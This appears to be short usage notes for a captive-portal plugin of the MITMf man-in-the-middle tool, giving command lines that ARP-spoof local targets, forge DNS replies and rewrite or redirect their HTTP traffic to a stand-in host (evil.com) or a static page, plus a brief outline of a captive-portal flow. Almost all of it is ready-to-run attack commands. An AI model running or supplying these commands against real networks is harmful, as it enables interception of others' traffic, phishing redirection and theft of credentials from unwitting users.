This command simply modifies all HTTP (80/tcp) and redirects them to portalurl.
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.178.1 --targets 192.168.178.29,192.168.178.21 --portal --portalurl http://www.evil.com
Additionally to the above, this command listens for DNS queries and responsed with a forged CNAME and A record to redirect to the portal host. Race condition exists, as the legitimate response is not filtered.
python mitmf.py -i wlan0 --log-level info --spoof --arp --gateway 192.168.178.1 --targets 192.168.178.21,192.168.178.29 --portal --portalurl http://www.evil.com --portaldns
This command modifies all HTTP (80/tcp) responses and overwrites everything with the static template.
python mitmf.py -i wlan0 --log-level info --spoof --dns --arp --gateway 192.168.178.1 --targets 192.168.178.21,192.168.178.29 --portal --portaltemplate /root/Tools/MITMf/config/portal/test.html
If your are running a wifi access point you can use the following command (no spoofing required).
python mitmf.py -i wlan0 --log-level info --portal --portalurl http://www.evil.com
- Client associates to the AP
- Client starts a browser and generates ARP/DNS/HTTP traffic
- HTTP gets captured by the Controller and then redirected to CP server URL
- Client sends a HTTP GET to the CP server